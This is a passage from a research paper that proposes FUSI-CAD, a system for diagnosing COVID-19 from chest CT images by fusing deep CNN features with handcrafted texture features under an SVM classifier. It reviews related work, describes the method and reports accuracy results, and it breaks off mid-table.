pneumonia. The authors in Wieczorek, Silka & Woźniak (2020) employed a multicenter study that combines CT images for COVID-19 patients from several countries to deliver probably a wide range of values about predicted COVID-19 spread. The authors constructed a convolutional neural network (CNN) architecture, which is consists of seven layers. The network is trained by NAdam, which is selected in tests for the greatest effectiveness and shortest training time achieving an accuracy 99%. Zheng et al. (2020) used UNet++ to segment lesions in CT images. Afterward, the bounding box of the segmented lesion was generated. Finally, a 3D-CNN was constructed for predicting the probability of COVID-19. The proposed method reached a sensitivity of 90.7%, a specificity of 91.1%, and an area under the receiver-operating curve (AUC) of 0.959 (95.9%). There were two limitations in this technique; first, the number of cases was small. Moreover, the UNet++ used in the segmentation of images may result in segmenting the infection areas that have small blood vessels that reduce the performance of the CAD system. The authors in Fang et al. (2020) applied radiomics analysis from a manually delineated region of interest (ROI) CT images to diagnose COVID-19. Afterward, unsupervised consensus clustering was used to choose significant features. Finally, a support vector machine (SVM) classifier was used to classify COVID-19. This study achieved an AUC of 0.826 (82.6%). The benefit of this study is using radiomics quantitative analysis as a feature extractor, which is considered as a powerful extractor along several medical domains (Lambin et al., 2012; Kolossváry et al., 2017). However, the main drawback of Fang et al. (2020) method is that the authors used only handcrafted features and discarded the advantages of DL techniques, and therefore, they did not attain high performance. Li et al. (2020) proposed a technique that depends on ResNet-50 CNN to classify COVID-19. The sensitivity, specificity, and AUC produced were 87%, 92%, and 0.95 (95%), respectively. The privilege of such a technique is that it used large amount of images. Moreover, it utilized a heatmap to picture the important areas in the images in the classification. Nevertheless, the heatmaps are not yet sufficient to capture what distinctive features are utilized by the model to differentiate between COVID-19 and non-COVID-19. Furthermore, Ardakani et al. (2020) compare the performance of 10 popular CNN to differentiate COVID-19 from non-COVID-19 patients. The results showed that ResNet-101 and Xception CNNs have the highest performance. The accuracy, AUC, sensitivity, and specificity obtained by ResNet-101 CNN were 99.51%, 0.994 (99.4%), 100%, and 99.02%, respectively. However, the Xception CNN attained an accuracy of 99.02%, an AUC of 0.994 (99.4%), a sensitivity of 98.04%, and a specificity of 100%. The main advantages of Ardakani et al. (2020) method are using very high-resolution images and splitting each image in the dataset into several patches that are then used to Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 3/30 http://dx.doi.org/10.7717/peerj-cs.306 https://peerj.com/computer-science/ train the CNN. The authors in Singh, Kumar & Kaur (2020) introduced a novel CNN and tuned its initial parameters by using a multi-objective differential evolution (DE) method, which was the key privilege of their CAD system. The DE algorithm has confirmed its effectiveness in various domains (Zhang & Sanderson, 2009). This evolution technique guarantees that the individual that has superior merits is left as a portion of the population and fragile individuals are detached with each iteration (Hancer, Xue & Zhang, 2018). The results obtained were almost 93%. However, the limitation of Singh, Kumar & Kaur (2020) and Ardakani et al. (2020) study is they did not compare the performance of their CAD system with that of the radiologist. He et al. (2020) employed several CNNs to classify COVID-19 cases. The best performance was achieved by DenseNet-169 where, the accuracy and AUC were 86% and 0.94 (94%), respectively. The DenseNet is a novel CNN architecture, which can perform well in case of trained with a huge number of images; however, it has a high complexity and a large number of layers, which increase the chances of overfitting in case of trained with inadequate number of images. Hasan et al. (2020) proposed a hybrid approach based on CNN, Q-deformed entropy, and long-short-term-memory (LSTM) network and accomplished an accuracy of 99.68%. The advantage of this method is that the authors constructed a new CNN with few number of convolutional layers to decrease the over-fitting by reducing the CNN construction complexity. They also utilized a new feature extractor called Q-deformed entropy, which is a textural analysis method capable of providing a major benefit in medical image classification. In addition, the Q-deformed entropy is an entropy based technique that can detect small alterations in the image’s intensity values, along with sharpening the texture details (Al-Shamasneh et al., 2018). The authors in Bai et al. (2020) employed EfficientNet-B4 to identify COVID-19 with an accuracy of 87%, AUC of 0.9 (90%), sensitivity of 89%, and a specificity of 86%. The study of Bai et al. (2020) has compared the performance of the CAD system based on AI techniques with manual diagnosis by radiologists. It proved that the AI assistance had enhanced the radiologists’ performance in diagnosing COVID-19 cases, but there could be a bias as a result of the radiologist’s evaluation of the same suspects twice, primary without, and then with AI assistance, whereas the authors in Amyar, Modzelewski & Ruan (2020) used two U-Nets to diagnose COVID-19. The first network was used to segment the lung from the rest of the image, while the other one for classification. The accuracy, AUC, sensitivity, and specificity achieved were 86%, 0.93 (93%), 94%, and 79%, respectively. The benefit of this method is using a multi-task learning method, which fuses several portions of information from different tasks to enhance the performance of the CAD system and its capability to better generalize. U-Net was used as well in Chen et al. (2020) to discriminate COVID-19 and non-COVID-19. The results obtained showed an accuracy of 95.2%, a sensitivity of 100%, and a specificity of 93.6%. The reason of such good results is the huge number of images used to train their U-NETs. A summary of similar studies is shown in Table 1. As it is obvious from the table that most of the related work is based on DL techniques, which either employing a single CNN or combining two CNNs where the first CNN is used for segmentation and the other Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 4/30 http://dx.doi.org/10.7717/peerj-cs.306 https://peerj.com/computer-science/ Table 1 A summary of recent similar related studies. Paper Dataset Method Results Butt et al. (2020) 219 COVID-19 339 Others ResNet-18 and ResNet-23 Accuracy = 95.2% AUC = 0.996 (99.6%) Sensitivity = 98.2% Specificity = 92.2% Li et al. (2020) 468 COVID-19 2,996 Others ResNet-50 Accuracy = 89.5% AUC = 0.95 (95%) Sensitivity = 87% Specificity = 92% Bai et al. (2020) 521 COVID-19 665 others EfficientNet-B4 Accuracy = 87% AUC = 0.9 (90%) Sensitivity = 89% Specificity = 86% He et al. (2020) 191 COVID-19 234 others DenseNet-169 Accuracy = 86% AUC = 0.94 (94%) Amyar, Modzelewski & Ruan (2020) 449 COVID-19 595 others Two U-Nets Accuracy = 86% AUC = 0.93 (93%) Sensitivity = 94% Specificity = 79% Ardakani et al. (2020) 108 COVID-19 86 others ResNet-101 Accuracy = 99.51% AUC = 0.994 (99.4%) Sensitivity = 100% Specificity = 99.02% Xception Accuracy = 99.02% AUC = 0.994 (99.4%) Sensitivity = 98.04% Specificity =100% Chen et al. (2020) 4,382 COVID-19 9,369 others U-Net++ Accuracy = 95.2% Sensitivity = 100% Specificity = 93.6% Zheng et al. (2020) 313 COVID-19 229 Others U-Net and CNN Accuracy = 90.9% AUC = 0.959 (95.9%) Sensitivity = 90.7% Specificity = 91.1% Jin et al. (2020b) 723 COVID-19 413 Others U-Net and ResNet-50 Accuracy = 94.8% Sensitivity = 97.4% Specificity = 92.2% Hasan et al. (2020) 118 COVID-19 203 Others CNN,Q-deformed entropy, and LSTM Accuracy = 99.68% Jin et al. (2020a) 496 COVID-19 1,385 Others Deeplab-v1 and ResNet 152 Accuracy = 94.8% AUC = 0.979 (97.9%) Sensitivity = 94.1% Specificity = 95.5% Song et al. (2020b) 219 COVID-19 399 Others ResNet-50 Accuracy = 86% AUC = 0.95 (95%) Sensitivity = 96% Precision = 79% Singh, Kumar & Kaur (2020) – CNN Accuracy~93% Wang et al. (2020) 325 COVID-19 740 Others Inception and Adaboosted decision tree Accuracy = 82.9% AUC = 0.9 (90%) Sensitivity = 81% Specificity = 84% Fang et al. (2020) 46 COVID-19, 29 others Radiomic feature extraction, clustering and SVM AUC = 0.826 (82.6%) Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 5/30 http://dx.doi.org/10.7717/peerj-cs.306 https://peerj.com/computer-science/ is for the classification and diagnosis of COVID-19. However, the process of fusing multiple CNNs is not well examined in previous studies. Moreover, almost all of the existing studies depend on DL only as a feature extraction, which may have some limitations regarding feature extraction complexity. Feature extraction is a vital process for extracting important spatial variations of the image pixels. Although, DL is considered a powerful tool for large- scale image classification and feature extraction, however, it could not be the ideal choice when the dataset available is not large containing a small number of images (Nguyen et al., 2018). DL techniques may hardly employ heuristics to direct feature extraction for every particular task because of the automatic feature extraction procedure. They can also face the problem of overfitting when the training dataset is not large (Zhang et al., 2017; Nanni, Ghidoni & Brahnam, 2017). Fusing DL and handcrafted features may improve the performance of the image classification problems (Hasan et al., 2020; Wei et al., 2019a; Hansley, Segundo & Sarkar, 2018). Therefore, in this study, we proposed an efficient novel CAD system called FUSI-CAD, which investigates the effect of fusing handcrafted features and DL features extracted from multiple CNNs trained with COVID-19 CT images. The proposed system as it will be discussed later consists of three stages: � Stage (1)—Deep features fusion: This is performed by extracting and fusing the deep features of the fine-tuned AlexNet, GoogleNet, ShuffleNet, and ResNet-18 CNN architectures. � Stage (2)—Handcrafted features fusion: This is accomplished by extracting and fusing three types of handcrafted (HC) features; the statistical features, discrete wavelet transform (DWT), and grey level co-occurrence matrix (GLCM) features. � Stage (3)—FUSI-CAD (DL and HC feature fusion): This is implemented by fusing the features of both stages (1) and (2). The FUSI-CAD system compares its performance with stages (1) and (2) to test the effect of fusing multiple DL features with three HC features on the performance of the CAD system. The novelty of the FUSI-CAD system is concentrated in several contributions: � Exploring various CNN based approaches different than that have been utilized in the literature for detecting the presence of COVID-19 from chest CT images. � Fusing features extracted from the deep layers of CNNs to diagnose COVID-19 patients, as the fusion of deep features was not examined in the literature. � Combining powerful handcrafted features to diagnose COVID-19 patients, as this was not examined in the literature. � Comparing the usage of deep features with handcrafted features for diagnosing COVID-19 with a dataset of few numbers of images. � A feature fusion based approach is proposed, which combines deep features from multiple individual CNNs models with three powerful handcrafted features based on textural analyses, to produce a final accurate and efficient diagnostic tool even with a COVID-19 dataset containing small number of images. Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 6/30 http://dx.doi.org/10.7717/peerj-cs.306 https://peerj.com/computer-science/ � Developing a final fused model (multiple deep features and three handcrafted features), which is able to verify that each of the two feature extraction paradigms is capable of extracting information that is neglected by the other paradigm. � Constructing a reliable model that is faster and more accurate than the conventionally used RT-PCR testing kit. METHODS AND MATERIALS Dataset description The dataset used is SARS-CoV-2 CT-scan dataset. It is acquired from a hospital in Sao Paulo, Brazil, and permitted by their ethical committee. The description of this dataset is available in Soares et al. (2020). The dataset contains 1252 CT-images of COVID-19 positive cases for 60 patients (32 male +28 female) and 1230 CT-Scans for non-COVID-19 cases for 60 normal patients (30 male +30 female), which are COVID-19 negative but may have other pulmonary illnesses. Figure 1 shows some samples extracted from the dataset representing CT images for COVID-19 and non-COVID-19. Convolutional neural networks Convolutional neural network (CNN) is a branch of DL methods that are broadly used for resolving classification problems of medical images in health informatics field (Jin et al., 2020b; Ravì et al., 2016). For this reason, four CNN architectures are employed in this article. Any CNN involves several layers including; convolutional layers, pooling layers, and fully connected (fc) layers. In the first layer, several filters are convolved with the region of the input image corresponding to the same dimension of the filter. Next, a feature map is created representing the position of the features in the original image. Such features characterize the spatial information of the pixel values of the original input image. Then, the pooling layer lowers the huge dimension of the feature map using a down sampling process. Lastly, the fc layer accomplishes the classification procedure similar to the conventional artificial neural network (ANN). CNN can be either used as a classifier or feature extractor. In this paper, four CNNs are employed as feature extractors. Such networks include AlexNet (Krizhevsky, Sutskever & Hinton, 2012) and (Dirvanauskas et al., 2019), GoogleNet (Szegedy et al., 2015), ShuffleNet (Girshick et al., 2014) and ResNet-18 (He et al., 2016) constructions. The architectures of AlexNet, GoogleNet, ShuffleNet, and ResNet-18 CNN are illustrated in Figs. 2–5, respectively. The CNN networks are trained using the ImageNet dataset, which has 1.2 million natural images in 1,000-labelled classes. The transfer learning technique is performed on these networks so that it can be used in any classification problem. This is implemented by replacing the last fully connected layer in any network by a new layer for the classification of two classes: COVID-19 and non-COVID-19. To our knowledge and according to the literature these networks have not yet been employed as feature extractors to classify COVID-19. A summary of the architecture of the four networks is shown in Table 2. Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 7/30 http://dx.doi.org/10.7717/peerj-cs.306 https://peerj.com/computer-science/ The proposed computer-aided diagnosis system The proposed CAD system consists of four steps, which are image enhancement, feature extraction, feature fusion, and feature classifications steps. In the image enhancement step, images were enhanced using an adaptive contrast enhancement method. Figure 2 AlexNet CNN architecture. Full-size DOI: 10.7717/peerj-cs.306/fig-2 Figure 3 GoogleNet CNN architecture. Full-size DOI: 10.7717/peerj-cs.306/fig-3 Figure 1 Samples of CT images (A)–(C) COVID-19 CT images and (D)–(F) non-COVID-19 CT images. Full-size DOI: 10.7717/peerj-cs.306/fig-1 Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 8/30 http://dx.doi.org/10.7717/peerj-cs.306/fig-2 http://dx.doi.org/10.7717/peerj-cs.306/fig-3 http://dx.doi.org/10.7717/peerj-cs.306/fig-1 http://dx.doi.org/10.7717/peerj-cs.306 https://peerj.com/computer-science/ Afterward, in the feature extraction step, two types of features were extracted. First, four pre-trained CNNs were constructed and used as feature extractors. These CNNs include AlexNet, GoogleNet, ShuffleNet, and ResNet-18 architectures. Second, three handcrafted (HC) feature extraction methods were employed to extract the features from the CT images. These handcrafted methods consist of statistical features and the textural analysis features; such as discrete wavelet transform (DWT) and grey level co-occurrence matrix (GLCM). Next, the feature fusion step, where features were fused in three stages; Figure 5 ResNet-18 CNN architecture. Full-size DOI: 10.7717/peerj-cs.306/fig-5 Figure 4 ShuffleNet CNN architecture. Full-size DOI: 10.7717/peerj-cs.306/fig-4 Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 9/30 http://dx.doi.org/10.7717/peerj-cs.306/fig-5 http://dx.doi.org/10.7717/peerj-cs.306/fig-4 http://dx.doi.org/10.7717/peerj-cs.306 https://peerj.com/computer-science/ � Stage (1) is the deep features fusion: In this stage, the deep features extracted from the four fine-tuned pre-trained CNN were fused. The influence of DL feature fusion was not examined in the diagnosis of COVID-19, therefore, the novel part is investigating the impact of DL fusion on identifying COVID-19 patients. � Stage (2) is the handcrafted features fusion: This stage carried out a fusion from three HC feature extractors as mentioned previously. These features were not studied in the related work for coronavirus diagnosis and classification. Therefore, the novel part is using the HC features in coronavirus diagnosis and investigating the effect of combining these three features on the classification results. � Stage (3) is the FUSI-CAD system: This stage was implemented by fusing the features of both the multiple DL features of stage (1) and the fused handcrafted features of stage (2). The FUSI-CAD system was conducted to verify that fusing the features of stages (1) and (2) can improve the diagnosis performance of COVID-19. To the best of our knowledge, the fusion of DL and HC features was not examined in related CAD system discussing coronavirus diagnosis. Finally, in the classification step, the fused features were used to construct classification models using a support vector machine (SVM) with cubic kernel function to classify CT images into COVID-19 or non-COVID-19. The framework of the proposed CAD system is shown in Fig. 6. The steps of the proposed CAD system is discussed in detail in the following sub-sections. Image enhancement step Image enhancement is an important process to improve the image quality, contrast, and remove noise to help radiologists in identifying the abnormalities. There are several image enhancement methods; between them is the adaptive contrast enhancement method (AHE). AHE method has the ability to improve the local contrast and express more details in the image. In this study, the contrast-limited adaptive histogram equalization technique (CLAHE); a subclass of AHE is used to enhance the contrast of images (M.Pizer et al., 1987; Pisano et al., 1998). The CLAHE algorithm can be summarized as follows; (Sahakyan, 2012) 1. Split the original CT image into contextual areas, 2. Find a local histogram for each pixel, Table 2 A summary of the architecture of the four pre-trained CNNs used. CNN architecture Number of layers Input size Output size AlexNet 8 227 × 227 4,096 × 2 GoogleNet 22 224 × 224 1,024 × 2 ShuffleNet 50 224 × 224 544 × 2 ResNet-18 18 224 × 224 512 × 2 Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 10/30 http://dx.doi.org/10.7717/peerj-cs.306 https://peerj.com/computer-science/ 3. Bound this histogram established on the clip level, 4. Reorganize the histogram using binary examination, and 5. Get the enhanced pixel value by histogram integration. Feature extraction step In this step, handcrafted features along with DL features are extracted. The details of the feature extraction step are illustrated in this subsection. Handcrafted feature extraction Texture analysis feature extraction methods are well-known techniques for mining features from medical images (Castellano et al., 2004; Kassner & Thornhill, 2010; Lahmiri & Boukadoum, 2013; Depeursinge, Al-Kadi & Ross Mitchell, 2017). Such methods depend on the textural characteristics of the image. Textural features extraction methods include the discrete wavelet transform (DWT), and the gray-level co-occurrence matrix (GLCM). These techniques usually yield reasonable classification accuracy especially when they are combined (Nailon, 2010; Lahmiri & Boukadoum, 2013). For this reason, they are used in this study to extract several subsets of features along with statistical features from the spatial domain. Statistical features In this step, each image was divided into blocks of size 32 × 32. Afterward, eight statistical features were calculated from each block of an image in the spatial domain. Next, these features from all blocks were combined in one feature vector. These features include entropy, mean, standard deviation, variance, root mean square (RMS), minimum, maximum, and range as defined from Eqs. (1)–(6). The size of the statistical features extracted was 512. Entropy ¼ � Xn�1 i¼0 pri � log pri (1) where n is the number of grey levels. pri is the probability of a pixel having gray level i. MeanðmzÞ ¼ 1 FG XFG i:j¼1 pz i:jð Þ (2) where pz (i, j) is the pixels value in the image block z, F × G is the size of each block z. Standard deviation szð Þ ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi 1 FG XFG i:j¼1 pz i:jð Þ � mzð Þ2 vuut (3) Variance s2z � � ¼ 1 FG XFG i;j¼1 pz i:jð Þ � mzð Þ2 (4) Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 11/30 http://dx.doi.org/10.7717/peerj-cs.306 https://peerj.com/computer-science/ RMS ¼ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiXF:G i:j¼1 mz i:jð Þj j2 vuut (5) Range ðRzÞ ¼ pzmax � pzmin (6) Where pzmax and pzmin are the maximal and minimal pixel values in an image block z. Discrete Wavelet Transform Discrete wavelet transform (DWT) is a common approach to extract features in the medical image processing field (Lahmiri & Boukadoum, 2013; Srivastava & Purwar, 2017). DWT provides time-frequencies demonstration by decomposing an image using a set of orthogonal basis functions (Ortho-normal). DWT has a set of transforms each with a number of wavelet basis functions. In the case of 2-D images, one level 2-D DWT is employed; where a 1D-DWT is applied for every dimension distinctly to attain four sets of coefficients. The four coefficients generated from the 2-D DWT are the approximation coefficients CA1, and three detail coefficients CD1. The detail coefficients comprise the horizontal, vertical, and diagonal coefficients correspondingly. Multilevel 2-D DWT may be used as well to accomplish multiple decomposing levels. The multilevel decomposition is achieved by convolving the approximation components created in the preceding decomposition level into several high and low-pass filters (Mallat, 1989; Anitha & Murugavalli, 2016). An example of a first level decomposition for a non-COVID-19 sample is illustrated in Fig. 7C. Figure 6 The framework of the proposed CAD system. Full-size DOI: 10.7717/peerj-cs.306/fig-6 Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 12/30 http://dx.doi.org/10.7717/peerj-cs.306/fig-6 http://dx.doi.org/10.7717/peerj-cs.306 https://peerj.com/computer-science/ In the proposed FUSI-CAD system, 4-decomposing levels of DWT are applied to the images. The 4th decomposition level of 2D-DWT usually enhances the performance when used with medical as stated in Chato, Chow & Latifi (2018) and this is proved in the results section. In this paper, Haar wavelet was employed as a wavelet basis function. After performing four-level decompositions, the approximate, horizontal, vertical, and diagonal coefficients of the fourth decomposing stage were extracted to form a feature subset. The number of features extracted from the fourth level of DWT was 196. Grey-level co-occurrence matrix Grey-level co-occurrence Matrix (GLCM) approach is a common method for pulling out texture features from images (Haralick, Shanmugam & Dinstein, 1973). GLCM method is used to extract surface features such as; contrast, homogeneity, correlation, and energy Figure 7 The illustration of the handcrafted features. (A) Original non-COVID-19 sample, (B) enhanced image using CLAHE method, (C) the first level DWT decomposition and (D) GLCM features. Full-size DOI: 10.7717/peerj-cs.306/fig-7 Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 13/30 http://dx.doi.org/10.7717/peerj-cs.306/fig-7 http://dx.doi.org/10.7717/peerj-cs.306 https://peerj.com/computer-science/ in the images. GLCM features are determined using Eqs. (7)–(10). The length of the features extracted using GLCM was 64. An example of the GLCM features of a non-COVID-19 sample is shown in Fig. 7D. Contrast ¼ XG�1 n¼0 n2 XF i XG J P i:jð Þ ( ) : i � jj j ¼ n (7) Correlation ¼ XF i XG j i � jf g � P i:jð Þ � mx � my n o sx � sy (8) Energy ¼ XF�1 i XG�1 j P i:jð Þð Þ2 (9) Homogeneity ¼ XF�1 i XG�1 j P i:jð Þ 1 þ i � jj j (10) Where P (i, j) is a marginal joint probability grey-level co-occurrence matrix. Deep learning feature extraction step Convolutional neural networks that were pre-trained may be learned from the CT images to either carry out classification or feature extraction tasks. In the feature extraction task, useful deep features were taken out from one of the layers of the CNNs. In this study, instead of using the CNNs as classifiers, DL features were extracted from the “fc7,” the dropout layer named “pool 5 drop 7 × 7 s1,” the “global average pooling 2D layer” (fifth pooling layer), and “node 200” of the fine-tuned AlexNet, GoogleNet, ResNet-18, and ShuffleNet architectures, respectively. The length of DL features extracted from each CNN was 4,096, 1,024, 512, and 544 for AlexNet, GoogleNet, ResNet-18, and SuffleNet respectively. Feature fusion step The feature fusion step consists of three stages. In the first stage, all DL features extracted from the four CNNs were combined in a concatenated manner. The number of DL features after fusion was 6,176. In the second stage, all handcrafted extracted using DWT, GLCM, and statistical methods were fused. The length of the feature space for the handcrafted features was 772. As mentioned in related image classification problems that combining DL and handcrafted features may enhance the performance of classification problems (Hasan et al., 2020; Wei et al., 2019a; Hansley, Segundo & Sarkar, 2018). Thus, in the third stage, the FUSI-CAD system was constructed by fusing both the DL and HC features. to examine the effect of this fusion on the performance of FUSI-CAD system in distinguishing between COVID-19 and non-COVID-19 cases. The performance of the FUSI-CAD system was compared with the first two stages to test the effect of fusing multiple DL features with three HC features on the performance of the CAD system. Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 14/30 http://dx.doi.org/10.7717/peerj-cs.306 https://peerj.com/computer-science/ Classification step This step is responsible for classifying CT images to COVID-19 and non-COVID-19 using the SVM classifier. SVM is a machine learning method that uses statistical learning theory to perform classification. SVM classifier is used to construct the optimal hyperplane with the highest margin to separate between two groups of CT datasets. Support vectors represent the data points, which exist on the margin. SVM employs a kernel function to convert the feature space into a new domain to make the separation between the two classes of the datasets easier (Wagh & Vasanth, 2019). In this paper, the cubic kernel function is chosen as it achieved the highest results. PERFORMANCE EVALUATION The performance of the proposed FUSI-CAD system is calculated with several metrics such as accuracy, sensitivity, precision, specificity, F1-score, diagnostic odds ratio (DOR), and area under receiving operating characteristics (AUC). The equations used to calculate such metrics are shown below in Eqs. (11)–(16). Accuracy ¼ TP þ TN TN þ FP þ FN þ TP (11) Sensitivity ¼ TP TP þ FN (12) Specificity ¼ TN TN þ FP (13) Precision ¼ TP TP þ FP (14) F1 � Score ¼ 2 � TP 2 � TPð Þ þ FP þ FN (15) DOR ¼ TP � TN FP � FN (16) Where TP is the sum of COVID-19 images that are properly classified, TN is the sum of non-COVID-19 images that are properly classified. FP is the sum of non-COVID-19 images that are not correctly classified as COVID-19. FN is the sum of COVID-19 images that are not correctly classified as non-COVID-19. EXPERIMENTAL SET UP Parameter setting Some parameters are adjusted for the pre-trained CNNs. The mini-batch length and validation frequency are 10 and 4 correspondingly the total epochs are equal to 20 and the primary learning rate for the four CNNs is 10−4. The L-regularization is 0.0005. However, all other parameters are not altered. These arrangements are to approve that the Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 15/30 http://dx.doi.org/10.7717/peerj-cs.306 https://peerj.com/computer-science/ parameters are modified for classifying medical CT images of COVID-19. Stochastic gradient descent with momentum (SGDM) is applied for the optimization. To verify the performance of the proposed FUSI-CAD system, 5-folds cross-validation is employed. Augmentation Augmentation is an essential process that is usually made to enlarge the size of the dataset, which has a small number of images. This procedure is done as most likely the classification model is trained with an insignificant amount of data over-fit (Ravì et al., 2016). Overfitting means that the model will remember the details of the training set and will not execute well on testing sets. The augmentation method used to generate new lung CT images from the training data in this paper are translation, flipping, scaling, and rotation. Every original CT image was flipped then translated and scaled in x and y-directions with pixel range (−30 to 30) and scale range (0.9–1.1), respectively. Furthermore, the images were rotated with an angle range (0–180) degrees. RESULTS This study proposed a novel CAD system called FUSI-CAD based on the fusion of multiple CNNs and three handcrafted features to classify COVID-19 and non-COVID-19 cases. In this section, the classification results of the three stages of the features fusion are presented. Deep features fusion stage In this stage, the deep features from AlexNet, GoogleNet, ShuffleNet, and ResNet-18, CNNs were extracted, combined, and used to construct a cubic SVM classifier. The performance of the cubic kernel SVM classifier trained with the fused deep features was compared to the one constructed with DL features extracted from the four CNNs individually as shown in Table 3. For the single deep feature classification, the classification scores for ResNet-18 CNN features achieved the highest scores compared to the other CNN features. This was clear from Table 3, as the accuracy and AUC achieved were 97.6% and 1.00 (100%), respectively. However, the sensitivity, specificity, precision, and F1 score attained to 0.975 (97.5%) each. Moreover, the classification scores for the individual features of the GoogleNet and ShuffleNet CNNs were almost the same. This was because the accuracy achieved was 96.7% and 96.3% for GoogleNet and ShuffleNet CNNs, respectively. In addition, the AUC and the sensitivity were the same for both features achieving 0.99 (99%) and 0.97 (97%), respectively. However, there was a slight change in the scores of the specificity, precision, and F1 score for the two CNNs features. The scores achieved for GoogleNet and ShuffleNet CNNs features were 0.963 (96.3%) and 0.961 (96.1%), 0.962 (96.2%) and 0.96 (96%), and 0.966 (96.6%) and 0.965 (96.5%) for the specificity, precision, and F1 score, respectively. Conversely, the AlexNet CNN individual features achieved the least classification scores achieving 94.8%, 0.99 (99%), 0.95 (95%), 0.948 (94.8%), 0.947 (94.7%) and 0.949 (94.9%), for accuracy, AUC, sensitivity, specificity, precision, and F1 score, respectively. Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 16/30 http://dx.doi.org/10.7717/peerj-cs.306 https://peerj.com/computer-science/ On the other hand, for the deep feature fusion, it was clear that the fusion had improved the performance metrics of the SVM classifier compared to each DL features. This was because the accuracy, AUC, sensitivity, specificity, precision, and F1 score increased to 98.6%, 1.00 (100%), 0.981 (98.1%), 0.99 (99%), 0.99 (99%), and 0.986 (98.6%), respectively. Furthermore, the DOR had increased to 4851, which was also greater than DORs of the AlexNet, GoogleNet, ShuffleNet, and ResNet-18 respectively. Handcrafted features fusion stage Three types of handcrafted (HC) features were extracted from the CT images; the statistical features, DWT, and GLCM features. As stated previously, eight statistical features; entropy, mean, variance, standard deviation, minimum, maximum, and range were mined from the images. Afterward, these features were fused in one feature vector and classified using the cubic kernel SVM classifier giving an accuracy, AUC, and sensitivity of 97.6%, 0.99 (99%), and 0.971 (97.1%), respectively. Additionally, the specificity and precision accomplished the same score of 0.98 (98%). However, the F1 score and DOR achieved 0.976 (97.6%) and 1584.334, respectively. Furthermore, for the DWT features, four-level decomposition was performed on the CT images. The classification scores of the four levels of DWT were shown in Fig. 8. The classification scores of the coefficients of the fourth level DWT decomposition attained the highest scores compared to the other three levels, as it was clear in Fig. 8. The accuracy and AUC achieved were 95.2% and 0.98 (98%), respectively. Moreover, the GLCM features were extracted achieving an accuracy, AUC, sensitivity, specificity, precision, F1 score, DOR of 93.6%, 0.98 (98%), 0.931 (93.1%), 0.94 (94%), 0.94 (94%), 0.936 (93.6%) and 208.143, respectively. Afterward, the three HC features were fused and classified using a cubic SVM classifier. Since the coefficients of the fourth level DWT achieved the highest scores comparing to the other three DWT levels. Therefore, these features along with the GLCM and statistical features were fused forming one feature vector and used to construct a cubic SVM classifier. This SVM performance was compared with the performance of the SVM classifiers constructed separately with the features extracted for each of the four levels of DWT as well as GLCM features and the statistical features as shown in Table 4. Table 3 The evaluation metrics for the cubic kernel SVM classifier constructed with the fused DL features compared to SVM classifiers trained with each DL feature. CNN Accuracy (std) AUC (std) Sensitivity (std) Specificity (std) Precision (std) F1 score (std) DOR (std) AlexNet 94.8% (0.001) 0.99 (0) 0.95 (0) 0.948 (0.005) 0.947 (0.005) 0.949 (0.003) 342.001 (30.593) GoogleNet 96.7% (0.003) 0.99 (0) 0.97 (0) 0.963 (0.004) 0.962 (0.005) 0.966 (0.003) 829.889 (113.608) ShuffleNet 96.3% (0.001) 0.99 (0) 0.97 (0) 0.961 (0.001) 0.96 (0.001) 0.965 (0.001) 776 (0) ResNet-18 97.6% (0.003) 1.00 (0) 0.975 (0.006) 0.975 (0.006) 0.975 (0.006) 0.975 (0.006) 1,723.223 (714.441) DL FUSION 98.6% (0.001) 1.00 (0) 0.981 (0.001) 0.99 (0) 0.99 (0) 0.986 (0) 4,851 (0) Note: Bold values indicate the highest results. Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 17/30 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.306 The fusing of the three HC features had improved the performance of the SVM classifier, as it was clear in Table 4. The accuracy and AUC increased to 98% and 0.995 (99.5%). Moreover, the sensitivity and specificity were improved as well yielding to 0.976 (97.6%) and 0.984 (98.4%). In addition, the precision and F1 score were raised to 0.984 (98.4%) and 0.98 (98%). Furthermore, the DOR had increased to 2846, which was greater than the DORs of each HC features. Deep and handcrafted features fusion stage (FUSI-CAD System) The FUSI-CAD system proposed the fusion of DL and HC features to examine the effect of this fusion on the performance of COVID-19 diagnosis. Table 5 shows a comparison of DL, HC features fusion, and the proposed FUSI-CAD system (DL and HC features fusion) using a cubic kernel SVM classifier. All the classification results achieved by the FUSI-CAD system increased, as it was obvious in Table 5. The accuracy, sensitivity, specificity, precision, and F1 score increased Table 4 The evaluation metrics for the SVM classifier constructed with each individual and fused HC features. Handcrafted (HC) features Accuracy (std) AUC (std) Sensitivity (std) Specificity (std) Precision (std) F1 score (std) DOR (std) Statistical features 97.6% (0.002) 0.99 (0) 0.971 (0.001) 0.98 (0.001) 0.98 (0.001) 0.976 (0.001) 1584.334 (0.001) Fourth level DWT 95.2% (0.001) 0.98 (0.001) 0.951 (0.001) 0.953 (0.005) 0.953 (0.005) 0.952 (0.003) 389.5 (45.89) GLCM features 93.6% (0.002) 0.98 (0.001) 0.931 (0.001) 0.94 (0.001) 0.94 (0.001) 0.936 (0.001) 208.143 (0.001) HC FUSION 98% (0.003) 0.995 (0.006) 0.976 (0.006) 